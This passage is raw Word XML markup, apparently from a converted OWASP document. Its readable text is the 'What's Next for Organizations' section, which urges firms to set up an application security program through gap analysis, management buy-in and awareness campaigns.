      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="61EEC536">
          <v:shape id="_x0000_s2114" type="#_x0000_m2115" style="position:absolute;left:0;text-align:left;margin-left:88.05pt;margin-top:438.55pt;width:437.75pt;height:73.75pt;z-index:-251706880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20109C89">
          <v:shapetype id="_x0000_m2113" coordsize="43876,7478" o:spt="100" adj="0,,0" path="m43826,1280l43826,1280,43826,6199c43826,6199,43822,6300,43810,6398,43790,6494,43763,6588,43729,6677,43688,6764,43642,6846,43589,6925,43530,6999,43466,7068,43397,7132,43323,7191,43244,7244,43162,7291,43075,7331,42985,7365,42892,7392,42796,7412,42697,7424,42597,7428l42597,7428,50,7428,50,7428,50,50,50,50,42597,50c42597,50,42697,54,42796,66,42892,86,42985,113,43075,147,43162,187,43244,234,43323,287,43397,346,43466,410,43530,480,43589,554,43642,632,43688,715,43729,801,43763,891,43790,985,43810,1081,43822,1179,43826,1280e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3851E72C">
          <v:shape id="_x0000_s2112" type="#_x0000_m2113" style="position:absolute;left:0;text-align:left;margin-left:87.55pt;margin-top:438.05pt;width:438.75pt;height:74.75pt;z-index:-251705856;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#d4dcd3" strokeweight="1pt">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="391E4DB0">
          <v:shapetype id="_x0000_m2111" coordsize="1678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A973672">
          <v:shape id="_x0000_s2110" type="#_x0000_m2111" style="position:absolute;left:0;text-align:left;margin-left:136.3pt;margin-top:473.9pt;width:167.85pt;height:.6pt;z-index:-251704832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7610A7A0">
          <v:shapetype id="_x0000_m2109" coordsize="15900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7FB9AC2">
          <v:shape id="_x0000_s2108" type="#_x0000_m2109" style="position:absolute;left:0;text-align:left;margin-left:150.8pt;margin-top:497.65pt;width:159pt;height:.6pt;z-index:-25170380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A6D0B93">
          <v:shapetype id="_x0000_m2107" coordsize="43776,7378" o:spt="100" adj="0,,0" path="m43776,1230l43776,1230,43776,6148c43776,6148,43772,6249,43760,6348,43740,6444,43713,6537,43679,6627,43638,6714,43592,6796,43539,6875,43480,6949,43416,7018,43347,7082,43273,7141,43194,7194,43112,7241,43025,7281,42935,7315,42842,7342,42746,7362,42647,7374,42547,7378l42547,7378,,7378,,7378,,,,,42547,0c42547,,42647,4,42746,16,42842,36,42935,63,43025,97,43112,137,43194,184,43273,237,43347,296,43416,360,43480,430,43539,504,43592,582,43638,665,43679,751,43713,841,43740,935,43760,1031,43772,1129,43776,1230e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1461CD10">
          <v:shape id="_x0000_s2106" type="#_x0000_m2107" style="position:absolute;left:0;text-align:left;margin-left:88.05pt;margin-top:535.35pt;width:437.75pt;height:73.75pt;z-index:-251702784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07049D4E">
          <v:shapetype id="_x0000_m2105" coordsize="43876,7478" o:spt="100" adj="0,,0" path="m43826,1280l43826,1280,43826,6198c43826,6198,43822,6299,43810,6398,43790,6494,43763,6587,43729,6677,43688,6764,43642,6846,43589,6925,43530,6999,43466,7068,43397,7132,43323,7191,43244,7244,43162,7291,43075,7331,42985,7365,42892,7392,42796,7412,42697,7424,42597,7428l42597,7428,50,7428,50,7428,50,50,50,50,42597,50c42597,50,42697,54,42796,66,42892,86,42985,113,43075,147,43162,187,43244,234,43323,287,43397,346,43466,410,43530,480,43589,554,43642,632,43688,715,43729,801,43763,891,43790,985,43810,1081,43822,1179,43826,1280e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="57137F8B">
          <v:shape id="_x0000_s2104" type="#_x0000_m2105" style="position:absolute;left:0;text-align:left;margin-left:87.55pt;margin-top:534.85pt;width:438.75pt;height:74.75pt;z-index:-251701760;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#d4dcd3" strokeweight="1pt">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2210D8E8">
          <v:shapetype id="_x0000_m2103" coordsize="21264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5DF4D9">
          <v:shape id="_x0000_s2102" type="#_x0000_m2103" style="position:absolute;left:0;text-align:left;margin-left:245.5pt;margin-top:588.05pt;width:212.6pt;height:.55pt;z-index:-251700736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5E872E5A">
          <v:shapetype id="polygon175" o:spid="_x0000_m2101" coordsize="43776,7378" o:spt="100" adj="0,,0" path="m43776,1230l43776,1230,43776,6148c43776,6148,43772,6249,43760,6348,43740,6444,43713,6537,43679,6627,43638,6714,43592,6796,43539,6875,43480,6949,43416,7018,43347,7082,43273,7141,43194,7194,43112,7241,43025,7281,42935,7315,42842,7342,42746,7362,42647,7374,42547,7378l42547,7378,,7378,,7378,,,,,42547,0c42547,,42647,4,42746,16,42842,36,42935,63,43025,97,43112,137,43194,184,43273,237,43347,296,43416,360,43480,429,43539,503,43592,582,43638,665,43679,751,43713,841,43740,934,43760,1030,43772,1129,43776,1230e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="030A26EA">
          <v:shape id="WS_polygon175" o:spid="_x0000_s2100" type="#polygon175" style="position:absolute;left:0;text-align:left;margin-left:88.05pt;margin-top:632.2pt;width:437.75pt;height:73.75pt;z-index:-251699712;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#f3f3f3" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="378387EB">
          <v:shapetype id="polygon176" o:spid="_x0000_m2099" coordsize="43876,7478" o:spt="100" adj="0,,0" path="m43826,1280l43826,1280,43826,6198c43826,6198,43822,6299,43810,6398,43790,6494,43763,6587,43729,6677,43688,6764,43642,6846,43589,6925,43530,6999,43466,7068,43397,7132,43323,7191,43244,7244,43162,7291,43075,7331,42985,7365,42892,7392,42796,7412,42697,7424,42597,7428l42597,7428,50,7428,50,7428,50,50,50,50,42597,50c42597,50,42697,54,42796,66,42892,86,42985,113,43075,147,43162,187,43244,234,43323,287,43397,346,43466,410,43530,479,43589,553,43642,632,43688,715,43729,801,43763,891,43790,984,43810,1080,43822,1179,43826,1280e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4C0222F5">
          <v:shape id="WS_polygon176" o:spid="_x0000_s2098" type="#polygon176" style="position:absolute;left:0;text-align:left;margin-left:87.55pt;margin-top:631.7pt;width:438.75pt;height:74.75pt;z-index:-251698688;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#d4dcd3" strokeweight="1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+O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B1D90" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="455"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF9DA3B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What’s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Next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for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Organizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6235D6C2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467CBBB3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A399918" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB30A1B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45978639" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="35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Start Your Application Security Program Now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61051F6F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="421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Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C93C04A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effective capability for securing their applications. Given the staggering number of applications and lines of code already in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B449DFD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production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.   OWASP recommends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426DDB3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at organizations establish an application security program to gain insight and improve security across their application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F7A7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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>portfolio.  Achieving application security requires many different parts of an organization to work together efficiently, including</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3489E48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security and audit, software development, and business and executive management. It requires security to be visible, so that all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2910B27C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e different players can see and understand the organization’s application security posture.  It also requires focus on the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C15AB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activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner.  Some</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7F3B2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of the key activities in effective application security programs include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094CE4D0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F2A2DA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="396" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="1716"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·Establish an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>applic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secur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program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> and drive adoption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E743E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="257" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="1716"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·Conduct a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>capability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gap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analysis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comparing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organizati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to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your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</w:rPr>
        <w:t>peers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> to define key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9E2958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30A4DF00" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="65"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Get Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400BC829" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="65"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0A9979" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="65"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74AE82DB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="65"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65DF0BD5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="65"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D5E962" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="65"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016729E0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="65"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBE1E9C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="266" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="130"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Risk Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A93545" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="230" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="204"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Portfolio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D5AFA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="230" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="168"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55480A87" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="168"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C8B17D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="168"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794DD715" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="168"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A413631" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="168"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C8CF7D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="168"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCCD883" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="exact"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Enable with a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799AD4DB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="230" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="302"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Strong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4C966" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="230" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="89"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F2100" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E71D9C3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BBE2BD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F6186B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76139DB5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="401" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="187"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Integrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69961014" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="230" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Security  into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF3BBB0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="230" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="252"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Existing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D742268" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="231" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="166"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B58D6F6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="166"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3B537D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="166"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10FEBE20" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="166"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D091B1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="166"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3771F264" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="401" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="254"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Provide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296CBDEC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="230" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBEC72C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="230" w:lineRule="exact"/>
        <w:ind w:left="431" w:firstLine="211"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t>Visibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EBC4EA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="221" w:lineRule="exact"/>
        <w:ind w:firstLine="91"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>improvement areas and an execution plan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE2E5C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="254" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·Gain management approval and establish an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>appl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ecurit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awarenes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ampaign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> for the entire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7541E3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="221" w:lineRule="exact"/>
        <w:ind w:firstLine="91"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IT organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D595D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
